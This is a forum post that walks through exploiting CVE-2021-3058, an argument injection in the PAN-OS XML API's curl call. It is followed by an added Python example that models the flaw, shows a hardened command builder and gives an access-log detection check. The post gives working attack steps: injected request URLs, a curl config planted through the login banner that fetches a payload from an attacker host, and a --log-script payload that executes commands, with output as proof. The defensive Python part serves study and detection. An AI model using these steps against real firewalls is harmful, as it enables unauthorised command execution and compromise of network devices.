
zomg curl in my php!!! (cve-2021-3058)

Posted by rqu69


Forum: Da Slop Pit Group

hey you little pissbabiez
you think php is so cool, huh? you think php is so great? you talk a lotta big game for someone with such a vuln box!!

while grepping for command injection, i came across this code in /var/appweb/htdocs/php/rest/RestApi.php, which handles requests for the pan-os xml api.

$url = self::assertParamPresent("url");
$userName = self::param("user", "dummy");
$password = self::param("password", "dummy");
// ---- snip -----
$cmd = sprintf("/usr/bin/curl -k --user %s:%s %s", escapeshellarg($userName), escapeshellarg($password), escapeshellarg($url));
exec($cmd, $response, $exit_status);

this code is reached when requesting /api?type=vmware&action=sync. we control $userName, $password, and $url. escapeshellarg escapes single quotes and places single quotes around the text, which means we can't do normal shell injection or use spaces to inject completely arbitrary parameters. because of this, the userName and password fields are basically useless to us since they will always be seen as the argument for the --user flag. the url, however, is more interesting.

we can verify that we can inject parameters pretty easily.

$ curl -k --user 'user:password' 'https://<management IP>/api/?type=vmware&action=sync&url=--asdf'
<response status = 'error' code = '400'><result><msg>Internal Server Error</msg></result></response>

$ curl -k --user 'user:password' 'https://<management IP>/api/?type=vmware&action=sync&url=--help'
<?xml version="1.0"?>
<response status="error" code="17">
  <msg>
    <line><![CDATA[ request -> partner  is unexpected]]></line>
  </msg>
</response>

valid parameters return a different error from invalid parameters, so our arguments definitely make it through to curl.

using a single parameter, we can bootstrap our way to multiple parameter injection with the -K (--config) flag, which loads a curl configuration file. curl config files are essentially just a list of flags. to place a config file on disk, the easiest trick is to just set the login banner, which is stored in /etc/issue. to do this, log into the web management interface, go to Device->Management->General Settings->Edit (gear icon), and you can place a curl config in the login banner box.

a config such as

url = "http://<attacker>.com/payload.txt"
-o "/tmp/payload.txt"

will write an arbitrary file. unfortunately, since we're running as nobody (uid 99), arbitrary file writes don't immediately result in easy code execution. grr.

luckily, this is palo alto networks. and palo alto networks likes to make my job easy. they were kind enough to add a --log-script flag for curl, which will execute arbitrary commands when certain errors occur. as a poc, you can use the following payload.

url=file:///x/d
-o /rawr/xD
log-script "id>>/var/log/pan/owo;#"

then run this command to load the curl config

curl -k --user '<user>:<password>' 'https://<management IP>/api/?type=vmware&action=sync&url=-K/etc/issue'

you can verify the output from pan cli

> tail mp-log owo
uid=99(nobody) gid=99(nobody) groups=99(nobody)

so that's it for today's rad exploit xD
next time i'll show you how to escalate privileges from prep (nobody) to goth (root)
l8rz ^^



0 Replies
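Added example (not part of rqu69's post and not PAN-OS or curl code): the argument-injection pattern from the post re-created in Python so it can be studied without a firewall. shlex.quote() wraps a string in single quotes the same way PHP's escapeshellarg() does, so build_cmd_vulnerable() is the same shape as the sprintf() in RestApi.php. The script then parses the command the way a shell would and runs it through a small model of curl's option scanner (just enough of curl's option table for the flags in the post; the model, the hardened builder that validates the URL and passes it via curl's real --url option, and the access-log check are this example's own constructions, and the sample query strings are constructed).

```python
"""
Argument injection through escapeshellarg()-quoted curl arguments.

Added example, not code from the post, PAN-OS or curl. It rebuilds the
command-construction pattern from RestApi.php in Python, parses the result
like a shell, and walks the argv with a minimal model of curl's option
scanner so the injected -K / --help is visible without running curl.
"""
import shlex
from urllib.parse import parse_qs

CURL = "/usr/bin/curl"

# Small subset of curl's option table, enough for this demo (assumption:
# real curl has hundreds of options; these four take a value).
LONG_WITH_ARG = {"--user", "--url", "--config", "--output"}
SHORT_WITH_ARG = {"u", "K", "o"}


def build_cmd_vulnerable(user: str, password: str, url: str) -> str:
    """Same shape as the PAN-OS sprintf(): single-quoting stops shell
    metacharacters, but a value starting with '-' still reaches curl
    as a separate argv element and is parsed as an option."""
    return (f"{CURL} -k --user {shlex.quote(user)}:{shlex.quote(password)} "
            f"{shlex.quote(url)}")


def validate_url(url: str) -> str:
    """Reject anything that is not an http(s) URL: a leading '-' (option
    injection) and non-network schemes such as file:// (local reads)."""
    if url.startswith("-"):
        raise ValueError("URL must not start with '-'")
    if not url.lower().startswith(("http://", "https://")):
        raise ValueError("only http/https URLs are allowed")
    return url


def url_allowed(url: str) -> bool:
    """Boolean wrapper around validate_url() for callers that do not
    want to handle the exception."""
    try:
        validate_url(url)
        return True
    except ValueError:
        return False


def build_cmd_hardened(user: str, password: str, url: str) -> str:
    """Validate the URL and hand it to curl through --url, so even a value
    beginning with '-' is consumed as that option's argument, never as a
    new flag. Defence in depth: either measure alone would block the post's
    payload; together they also cover future validator mistakes."""
    return (f"{CURL} -k --user {shlex.quote(user)}:{shlex.quote(password)} "
            f"--url {shlex.quote(validate_url(url))}")


def curl_parse(cmd: str):
    """Minimal model of curl's command-line scan. Returns (options, urls):
    options is a list of (name, value) tuples, urls the positional targets
    plus any --url values. A bare '--' ends option parsing. Bundled short
    flags (-ks) are not modelled."""
    argv = shlex.split(cmd)[1:]          # drop the program path
    options, urls, i, stillflags = [], [], 0, True
    while i < len(argv):
        tok = argv[i]
        if stillflags and tok == "--":
            stillflags = False
        elif stillflags and tok.startswith("--"):
            val = None
            if tok in LONG_WITH_ARG:     # long option takes the next argv
                i += 1
                val = argv[i]
            if tok == "--url":
                urls.append(val)
            else:
                options.append((tok, val))
        elif stillflags and tok.startswith("-") and len(tok) > 1:
            name, rest = tok[1], tok[2:]  # '-K/etc/issue' -> K, /etc/issue
            val = None
            if name in SHORT_WITH_ARG:
                if rest:
                    val = rest
                else:
                    i += 1
                    val = argv[i]
            options.append(("-" + name, val))
        else:
            urls.append(tok)             # positional argument = URL
        i += 1
    return options, urls


def injected_options(cmd: str):
    """Options curl would see beyond the fixed template (-k, --user)."""
    opts, _ = curl_parse(cmd)
    return [o for o in opts if o[0] not in ("-k", "--user")]


def is_sync_option_injection(query: str) -> bool:
    """Access-log check: a type=vmware&action=sync request whose url=
    value begins with '-' is the pattern used in the post."""
    qs = parse_qs(query, keep_blank_values=True)
    if qs.get("type") != ["vmware"] or qs.get("action") != ["sync"]:
        return False
    return any(v.startswith("-") for v in qs.get("url", []))


# Constructed query strings, not real PAN-OS log data.
SAMPLE_REQUESTS = [
    "type=vmware&action=sync&url=-K/etc/issue",
    "type=vmware&action=sync&url=https://vcenter.example.com/",
    "type=op&cmd=%3Cshow%3E%3Csystem%3E%3Cinfo%3E%3C/system%3E%3C/show%3E",
]

if __name__ == "__main__":
    bad = build_cmd_vulnerable("user", "password", "-K/etc/issue")
    print(bad)
    print("curl sees:", curl_parse(bad))          # -K consumed, no URL at all
    good = build_cmd_hardened("user", "password", "https://example.com/x")
    print(good)
    print("curl sees:", curl_parse(good))
    print("rejected:", [u for u in ("-K/etc/issue", "file:///x/d") if not url_allowed(u)])
    print("flagged:", [q for q in SAMPLE_REQUESTS if is_sync_option_injection(q)])
```

Running it prints the quoted command for the post's -K/etc/issue payload and the argv curl would actually act on: the "URL" has become the -K option with /etc/issue as its value and there is no URL left, which is exactly why the firewall answered with a curl error rather than a fetch. The hardened builder refuses the same input, and a value that somehow got past validation would still be bound to --url instead of opening a new option.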